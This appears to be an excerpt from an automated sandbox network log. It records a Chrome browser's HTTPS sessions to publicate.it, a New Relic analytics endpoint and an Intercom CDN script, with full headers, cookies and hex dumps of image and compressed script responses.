                                                                                                                                                                                                        2024-08-30 16:16:29 UTC272OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 77 79 6a 74 6a 64 70 71 63 75 4d 74 34 6e 51 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 22 0d 0a 0d 0a 7b 22 65 6e 64 70 6f 69 6e 74 22 3a 22 75 70 64 61 74 65 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 70 72 6f 6a 65 63 74 22 3a 22 70 75 62 6c 69 63 61 74 65 2e 69 74 22 2c 22 65 76 65 6e 74 22 3a 22 70 76 22 2c 22 69 64 70 74 6e 63 22 3a 22 65 4e 43 6e 58 4c 35 4f 58 66 6c 68 22 2c 22 63 6f 6f 6b 69 65 22 3a 22 73 42 34 68 53 63 52 69 57 6b 6a 4f 22 2c 22 64 75 72 61 74 69 6f 6e 22 3a 38 35 34 36 7d 7d 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 77 79 6a
                                                                                                                                                                                                        Data Ascii: ------WebKitFormBoundarywyjtjdpqcuMt4nQgContent-Disposition: form-data; name="payload"{"endpoint":"update","params":{"project":"publicate.it","event":"pv","idptnc":"eNCnXL5OXflh","cookie":"sB4hScRiWkjO","duration":8546}}------WebKitFormBoundarywyj
                                                                                                                                                                                                        2024-08-30 16:16:29 UTC83INHTTP/1.1 204 No Content
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:16:29 GMT
                                                                                                                                                                                                        connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        139192.168.2.549935162.247.243.304436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:29 UTC787OUTPOST /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=55786&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1
                                                                                                                                                                                                        Host: bam-cell.nr-data.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 54
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        content-type: text/plain
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://indd.adobe.com
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://indd.adobe.com/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: JSESSIONID=4a13c21de71e3a5f
                                                                                                                                                                                                        2024-08-30 16:16:29 UTC54OUTData Raw: 62 65 6c 2e 36 3b 65 2c 27 70 61 67 65 48 69 64 65 2c 6c 61 30 2c 31 3b 36 2c 27 63 6c 73 2c 30 2e 30 30 30 30 32 38 39 34 30 37 36 36 34 39 31 32 30 31 32 34 36
                                                                                                                                                                                                        Data Ascii: bel.6;e,'pageHide,la0,1;6,'cls,0.000028940766491201246
                                                                                                                                                                                                        2024-08-30 16:16:29 UTC312INHTTP/1.1 200
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:16:29 GMT
                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                        access-control-allow-origin: https://indd.adobe.com
                                                                                                                                                                                                        access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        x-served-by: cache-ewr-kewr1740038-EWR
                                                                                                                                                                                                        2024-08-30 16:16:29 UTC24INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02
                                                                                                                                                                                                        Data Ascii: GIF89a,


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        140192.168.2.549937104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC799OUTGET /images/favicon.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:30 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 2479
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "9af-620aa1d1bd1e7"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UVxPq4Y1JylSM2Eug1tPdY5mmd7YbxHB6y0panNKlqrIqtxSjhkplAvZqvI9Y2LQ%2FDC7aPPLHScUuK977aIKD4fTjhfYtVkfFbjvlpzb5O43k%2ByJ%2BhddJN4PQqkRqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615ec2b647295-EWR
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC624INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 05 de 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 38 20 37 39 2e 31 36 34 30 33 36 2c 20 32 30 31 39 2f 30 38 2f 31 33 2d 30 31 3a 30 36 3a 35 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                                                                                                        Data Ascii: PNGIHDR szzpHYs.#.#x?viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RD
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC1369INData Raw: 32 31 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 20 78 6d 70 3a 43 72 65 61 74 65 44 61 74 65 3d 22 32 30 31 39 2d 31 31 2d 30 36 54 30 39 3a 34 37 3a 30 33 5a 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 31 39 2d 31 31 2d 30 36 54 30 39 3a 34 37 3a 30 33 5a 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 31 39 2d 31 31 2d 30 36 54 30 39 3a 34 37 3a 30 33 5a 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 33 31 30 33 36 63 64 63 2d 39 63 64 35 2d 34 39 36 36 2d 61 64 38 30 2d 62 33 38 66 31 63 38 31 65 65 63 38 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 66 30 36 33 61 32 66 2d 61 34 64 66 2d 39 35 34
                                                                                                                                                                                                        Data Ascii: 21.0 (Macintosh)" xmp:CreateDate="2019-11-06T09:47:03Z" xmp:MetadataDate="2019-11-06T09:47:03Z" xmp:ModifyDate="2019-11-06T09:47:03Z" xmpMM:InstanceID="xmp.iid:31036cdc-9cd5-4966-ad80-b38f1c81eec8" xmpMM:DocumentID="adobe:docid:photoshop:df063a2f-a4df-954
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC486INData Raw: 6b 2c d7 ac 30 7d e7 04 58 9e e8 a5 2e 2c ce 1a a2 03 2d 29 63 3b 89 00 37 af 80 e5 2f 4f 8c e0 91 d9 51 83 7c 63 77 90 35 e1 d7 a7 4c 17 82 1d 05 d8 1d 29 63 bb 89 00 0f 97 80 2a 2c be b1 c7 54 c0 cf 11 cc 31 de 6f 8d 5b 83 4e f8 cb d1 a5 b7 d5 94 5d 5f 82 a0 7d 17 28 b6 94 b1 3d 44 80 37 e9 74 23 04 4d d4 46 92 6b dd 7d 9f 39 e0 a6 0e 34 c6 06 90 54 49 6a 61 27 ac fa 16 e8 9a 1f 43 20 57 59 b6 a2 37 b9 80 36 4a ac d4 6f 37 a6 1d c9 af 36 dc 49 83 cf 8c 18 82 94 5b 82 61 b1 d2 90 83 42 0e a3 b0 31 d3 7e d5 75 02 e4 6a cb 22 f4 26 4e 01 3e 3d b1 38 e4 3a 0e d1 c5 39 88 fe 9e 82 c8 af 09 58 0b f9 68 11 6a 2a 44 3d 93 38 7c a6 51 cc 10 04 1f 1c c3 b6 50 63 1d 30 d8 0d fe 8b 96 e4 66 0a dc 09 05 60 cf ab 3d 17 80 e7 a3 be 2c 63 83 01 20 dc 6b 33 26 a5 d2 c4
                                                                                                                                                                                                        Data Ascii: k,0}X.,-)c;7/OQ|cw5L)c*,T1o[N]_}(=D7t#MFk}94TIja'C WY76Jo76I[aB1~uj"&N>=8:9Xhj*D=8|QPc0f`=,c k3&


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        141192.168.2.54993318.239.94.984436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC499OUTGET /frame.198be77c.js HTTP/1.1
                                                                                                                                                                                                        Host: js.intercomcdn.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC793INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                        Content-Length: 180597
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:31 GMT
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 16:09:26 GMT
                                                                                                                                                                                                        ETag: "217db78d093b259ba6cb3acdc68c2fe6"
                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                        Cache-Control: max-age=31536000, s-maxage=7200, public
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        x-amz-version-id: _ir1.LAGSeXOwyHhsKo0W1Id5Cs6LJsg
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        Via: 1.1 6c43684b05a77c1925eb58e93105a976.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        X-Amz-Cf-Id: qr74VVgt9922r_Qdu61_X3fNvl1nJJFOERIJ9n-3d6QVCmtU0FTZ3A==
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC15591INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd 7b 77 13 47 d6 37 fa ff f9 14 8d 32 8b 47 7a d3 ea 74 5d fa 26 8f 87 d7 71 c8 98 79 ec c0 04 e2 99 0c 87 c3 6a cb 6d 4b 41 17 23 c9 32 36 e8 bb 9f fd db d5 77 b5 8c 49 20 81 8c 16 58 6a 55 d7 bd 76 ed da f7 fa e6 ff dc b3 be 9f ce ac d1 b0 9f 4c e6 89 35 9c 9c 4d 67 e3 78 31 9c 4e ac 8b 51 12 53 d2 3c 49 ac b3 59 3c 4e 1c 11 85 27 49 10 f4 9d 5f e6 ce e1 a3 fd 87 3f 3c 7d e8 2c de 2c ac ff f3 cd ff 73 ef ec 72 d2 47 a9 76 e7 ed 32 9e 59 0b 3b b1 27 f6 cc 9e da c3 dd b7 81 92 ca ed e5 39 f8 9d c9 36 db 7d db 72 be 39 8b 87 a3 e4 d4 19 5f a8 56 4f c9 d0 57 36 25 4e a6 8b e1 d9 b0 cf 5d 31 af a2 48 69 81 57 d3 8b 64 16 2f a6 b3 b4 44 28 b5 46 f2 fc f2 64 3c 5c 98 44 ad 85 e7 af 76 b2 36 ad 69 7b 61 5a 4c 76 87 f4 b8 33 4b
                                                                                                                                                                                                        Data Ascii: {wG72Gzt]&qyjmKA#26wI XjUvL5Mgx1NQS<IY<N'I_?<},,srGv2Y;'96}r9_VOW6%N]1HiWd/D(Fd<\Dv6i{aZLv3K
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC3199INData Raw: cb 7e 15 28 fa b7 59 44 f8 31 ee bf 46 d8 61 6c 16 d7 67 b7 68 18 89 c9 30 2c fb c9 b3 21 b9 90 87 c6 b5 cc 85 47 76 cd b7 1d 2a 47 d7 3f c6 5d c8 b2 e6 61 6f 5e dd aa be 11 72 4b 6f 7c 91 d0 79 9b 0a 11 1e 83 55 50 3b 50 35 58 0d 6a b0 da a4 5b 34 ca c4 9a 86 11 1e 07 96 11 07 15 bc 2a ac 44 11 99 98 68 7e 38 82 95 df 18 2e 76 b0 96 9c 16 40 6d ca d9 54 59 fd 4d 5a 19 b8 a3 4a 72 44 98 fa 56 8f 2d 2d 55 b0 b5 99 fc a2 6c 26 6b f6 91 de a9 db bf d5 3e f2 c3 62 4e 69 20 d4 3e ac 1b 1d 97 98 59 e2 69 23 8d eb dc 38 ea b6 0e 46 ec 96 c3 3e 18 a5 80 33 2c 74 26 d8 18 a5 b7 0a aa 52 04 29 40 34 6d 16 fa 1b f1 0b 64 29 bf 8c 98 a7 f5 b0 cf 38 2c 95 10 7d e6 5a 53 61 b5 f2 60 fc cd 3c af a6 be a9 10 11 ea 43 3a 17 cc a7 c1 f6 01 db ac d0 5b d7 1b b1 00 8a c3 84
                                                                                                                                                                                                        Data Ascii: ~(YD1Falgh0,!Gv*G?]ao^rKo|yUP;P5Xj[4*Dh~8.v@mTYMZJrDV--Ul&k>bNi >Yi#8F>3,t&R)@4md)8,}ZSa`<C:[
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC12792INData Raw: 63 b9 c1 5e 23 1f d7 75 a6 7e 30 91 85 8d dc df 88 e6 16 74 da d1 4e b7 fb bb 97 a9 82 a7 26 e9 b7 98 6a c6 10 57 97 86 92 4d e8 ac e8 a5 c4 73 2e 77 ed a7 14 30 ce f2 a2 e1 71 a9 9e 12 71 52 c0 ab 5d 9a 8e 9c b4 24 42 3c ad be 44 50 33 91 90 1e ec e9 78 21 3b 2a 1b db 50 5b d7 ed 21 8f 32 26 be 21 43 77 a5 fe 5c ae e5 c9 44 be 9d 55 dc 36 fc 01 53 e6 2c f0 3d df 15 ae 6b 9f ec 2a 3f f1 8a 76 ae da eb 43 62 a4 48 a4 b0 33 8a 29 69 90 cc be 1b ce fb 53 a2 8f af 8f a6 a7 e0 1e 0e 9b d2 1f 5f 24 90 bc 12 7e 33 6a ff 49 bf d3 06 6d 9f 2c 9e 0d c7 09 9d 99 ed 26 0e a0 fd b2 0d e9 3e e1 eb f7 e6 e4 5a af ff d9 c9 0a 10 86 37 a5 ab 9a 93 c6 d1 2c da 18 0f 4d 34 f5 fe 28 99 13 65 7c 9e cc d0 e3 07 fb 15 c8 b7 33 b4 62 cf 76 c1 0c 4c f9 ac 22 5e 75 42 58 e1 64 3a
                                                                                                                                                                                                        Data Ascii: c^#u~0tN&jWMs.w0qqR]$B<DP3x!;*P[!2&!Cw\DU6S,=k*?vCbH3)iS_$~3jIm,&>Z7,M4(e|3bvL"^uBXd:
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC2568INData Raw: ad 8d e5 e2 5a fe a2 43 f7 1d cd d9 cb a9 e6 79 77 ce 5e e9 50 85 9d 39 eb 1e 68 9e 3b 73 e6 77 34 cf c7 73 36 fe 45 f3 7c 34 67 1f 7b da f8 98 2a d6 8d 03 dc c2 0c e0 46 58 b7 ad 8d 0d 89 f6 e6 f0 b1 0c ec 96 03 d0 66 a8 dc 7f 50 48 cb 7e 2e a4 65 6c e4 22 29 fe 73 43 5a fa 4b 87 b4 1c 14 8e ff 6f 15 d2 72 50 0a 69 39 58 3a a4 a5 f3 73 85 b4 1c 7f db 90 96 dc ad 61 f8 c3 42 5a 0e fe 99 21 2d 07 df 2c a4 65 dc 1e 2f 0a 69 19 2b ae eb 3e 8f 8a c7 06 6d 3f 1f d2 72 a0 86 b4 ec 53 f8 77 31 57 03 7d 48 cb c1 37 0b 69 39 d0 ca 95 4a 48 4b ff cb 42 5a c6 3f 79 48 cb 61 c9 7a 52 85 b4 bc 3d a4 e5 f0 7b 85 b4 1c 57 21 2d 27 7f 9f 90 96 e3 2a a4 65 15 d2 b2 0a 69 f9 83 42 5a f6 7f ca 90 96 03 f8 d4 ff 97 87 b4 1c 10 ae e5 7b 86 b4 1c fc c8 90 96 ce f7 0f 69 39 00
                                                                                                                                                                                                        Data Ascii: ZCyw^P9h;sw4s6E|4g{*FXfPH~.el")sCZKorPi9X:saBZ!-,e/i+>m?rSw1W}H7i9JHKBZ?yHazR={W!-'*eiBZ{i9
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC16384INData Raw: bb a3 1a f4 0d c4 88 29 b2 30 68 aa 86 7b b8 86 43 ac 89 ea 31 17 34 bf 92 e4 ed 96 c6 8b 7b 65 a2 31 12 dd 33 ee 81 b0 7c 2f 91 73 05 e2 cf c2 60 56 9e 75 dc 80 f3 00 9a 25 93 52 fe 6a be 04 9c 79 e6 88 a2 4c f6 11 48 9f f9 b7 d4 7e ff bc 9f d6 8e 61 c8 36 96 23 ed f8 4c 8f f5 fa b4 ad c5 7a a9 71 ad 38 9d 87 59 66 37 24 79 62 29 85 74 6e f9 7e 28 52 53 fa 22 bd e8 1d b4 27 65 a2 b2 31 81 00 41 b6 13 2b 9e f4 46 9e 4a 61 91 c3 21 a0 c6 40 54 ae c9 e9 67 c3 b2 22 04 dc 36 68 df a8 d1 0c 4b 54 85 a5 7d d1 9c cd cf 9c 0e d0 55 ae c5 0e 75 82 04 c7 3a fb 8c b3 fe 2a f2 5a 02 ba 1e 70 c4 7b c0 bc 60 3c 49 5e 93 45 08 a4 3d 81 cf cb 51 48 71 e1 6d cb 39 1e 30 59 5f 92 ab cf 2d 10 4d f1 cb df 1f 7f e2 eb 4f 7b 01 59 03 e2 c2 72 24 53 6e ee aa 33 5b dc dc 9c 6d
                                                                                                                                                                                                        Data Ascii: )0h{C14{e13|/s`Vu%RjyLH~a6#Lzq8Yf7$yb)tn~(RS"'e1A+FJa!@Tg"6hKT}Uu:*Zp{`<I^E=QHqm90Y_-MO{Yr$Sn3[m
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC1024INData Raw: fc 90 2f d0 a7 37 e2 8f e9 4f b2 d6 90 11 85 03 1f f1 cf b9 1c c8 be 76 1c d8 df ed e6 ce ce fa 97 f4 17 4d a1 2b 2b 7c ee a0 c0 08 e8 44 18 c9 25 23 b8 bb d1 e6 da c6 c6 d6 52 ba fe fd 17 3a dd 1d 23 c3 84 9a 17 07 73 f6 44 17 0b ee e9 9c 3d d5 29 d1 bf cf d9 b3 03 9d 11 00 1a 78 a6 d3 ea 9f c3 f3 81 e6 f9 1b 78 fe 41 1f 9c ee 58 67 7d e8 c2 f3 27 9a e7 9d 39 7b ae b3 4a bc 9f b3 5f 5e eb 68 0e 3a fa cb 1b 1d 03 c4 17 13 cd 8b eb 39 7b a1 9b ba fd 39 3b 79 a5 79 7e 3c 67 67 1d cd f3 43 78 de d7 3c ff 38 ff ff ec bd 0b 77 db 46 b2 2e fa 57 18 ee b9 5e e2 09 84 e0 fd 60 b6 8e 8e ac d8 b1 27 72 ec b1 6c 27 13 5f 5f 2e 88 84 24 c6 14 a9 f0 61 5b 56 f4 df 6f 7d 55 dd 8d 06 08 ea 65 67 f6 ec bd ce 4c 2c 02 dd 85 7e 56 77 57 55 d7 c3 f9 47 db 50 83 ae 3b fc 67
                                                                                                                                                                                                        Data Ascii: /7OvM++|D%#R:#sD=)xxAXg}'9{J_^h:9{9;yy~<ggCx<8wF.W^`'rl'__.$a[Vo}UegL,~VwWUGP;g
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC16384INData Raw: 07 15 6d 5c ac 96 a7 b3 79 ff 92 49 5e ad 24 09 3b 1f 4e af f4 1c d9 4b 84 73 3c 9e 2f 94 95 9c d2 94 5c 07 85 99 22 41 0d f8 83 e2 43 b1 2c a8 f8 c5 1f 2b 62 b0 fd 20 d3 1f ce d7 3f 9c bb 02 0d 2f b4 8c 2c d4 5c 79 10 ae ce 99 14 47 84 bc 94 2a 0f 2a 15 57 69 bc fd bc c4 ec f5 e1 c5 5d 25 0c 78 3e 77 71 8d de 4c d4 e3 63 cd f0 be cd 46 b4 4e 50 7b ab be 56 fd 7b 36 86 ed 5e ca 2d ec 00 a7 d6 00 cd b9 ea db 32 f4 4f 75 60 e2 5e 4e 68 87 5d b4 40 3e af 39 ff 77 95 23 c7 d2 3d 17 73 2c 22 44 cc 19 33 df bd bc ea 23 60 d3 cc ec 91 4f 8a c5 be 2c 63 a2 4e 66 ae 72 b3 37 9b be 1a 9b cb 01 d9 db 08 49 95 7d 57 73 65 99 2d 98 ce f3 81 da 13 fa 63 c7 14 35 58 52 59 74 44 f5 f8 d2 ba e5 73 6b e9 72 f7 ec 65 f9 d4 1a 87 f7 2c 72 f9 06 e8 41 e8 87 55 3e 1e 8e cf d9
                                                                                                                                                                                                        Data Ascii: m\yI^$;NKs</\"AC,+b ?/,\yG**Wi]%x>wqLcFNP{V{6^-2Ou`^Nh]@>9w#=s,"D3#`O,cNfr7I}Wse-c5XRYtDskre,rAU>
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC13816INData Raw: 67 66 ea 9b 26 d2 6b 9e 44 a1 e9 82 0f bc 62 8e 47 ba 48 ef 84 f8 69 35 04 71 35 3a 71 35 64 b1 1e c7 37 74 2a 86 61 9a 03 30 07 b7 4a 28 88 09 a3 23 34 4c 43 53 1c ce da 38 4f f6 75 75 cc cf 66 61 47 37 87 1a ed 67 81 af 5b 8b f3 3b ce d3 7d dd 17 fa 4d f3 5c 8e 77 f4 15 e9 21 8a e5 a1 e0 cf 69 a0 69 11 a8 a1 c2 3b b6 0c 3d 88 7e d8 c1 9f 7d 22 11 02 0c 11 88 f4 20 8f 32 f9 32 05 c9 41 ec 6f 28 af 61 16 1f 80 41 e0 76 13 e1 92 a6 d1 3e 06 33 0d 64 b8 62 48 15 88 3d 48 3c 26 24 e2 8c 77 0e 1a 0c 79 8d 62 6a 37 f5 32 27 62 15 ef 1e da 43 eb db f7 f9 f3 30 4b 79 d3 09 a9 1e bc d3 96 8e c5 8b fd 0e 04 3f 0f 41 92 86 b9 3c 11 37 10 bc 51 43 fd db 33 a0 50 b4 8f bf b4 71 d0 30 44 ea 97 e7 a8 13 3f c1 a8 ee 83 16 0a 38 91 a9 24 81 e0 c7 e8 0d e5 06 e8 3a e5 0b
                                                                                                                                                                                                        Data Ascii: gf&kDbGHi5q5:q5d7t*a0J(#4LCS8OuufaG7g[;}M\w!ii;=~}" 22Ao(aAv>3dbH=H<&$wybj72'bC0Ky?A<7QC3Pq0D?8$:
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC13565INData Raw: db bf 12 ed e7 e8 1b 1c 52 b3 b0 7b d2 00 da 21 75 ec 00 71 0d f8 35 9a 0a b7 16 a2 84 d0 ac f7 9f c7 5e bf fb d9 94 d1 78 e9 fe 68 12 17 df 02 87 f9 17 53 42 e5 a5 1b 98 da 39 5b ba 13 93 ee ed 06 66 6f ba 4c be 07 da 68 4a d8 fc 21 3f 2d e8 ca b7 d7 ec d4 1a 74 e5 5b 8d f0 5e 0c 2f 7c 01 29 6a 7c e3 0b 65 be c8 d4 db 87 dd 4b 99 7a a1 6c 24 f2 f4 42 b5 36 25 ea 85 b2 29 a7 e9 6d 35 6b bd ae 82 52 73 65 25 e7 ff 41 57 c4 73 4d 9d 70 ad dc b9 ff 1b 71 ec d7 db 38 f6 5b 24 65 ab a6 76 95 60 79 20 35 b1 8f 4b 37 92 53 ce 21 46 e7 88 3e 1a 37 17 65 80 03 0c a3 40 96 ab fa 56 de 5a 19 4c 0f 3e bf f5 a7 8b 60 89 02 e3 ba 55 3c e4 3f 03 18 02 48 0d 39 a6 3c 3d 59 7f fa 93 fc 61 a1 24 00 d0 7f 88 46 6f d5 f7 5a 89 85 ac 3e 1c c8 7c 1a 9f f9 57 54 45 f9 ad 1c 4c
                                                                                                                                                                                                        Data Ascii: R{!uq5^xhSB9[foLhJ!?-t[^/|)j|eKzl$B6%)m5kRse%AWsMpq8[$ev`y 5K7S!F>7e@VZL>`U<?H9<=Ya$FoZ>|WTEL
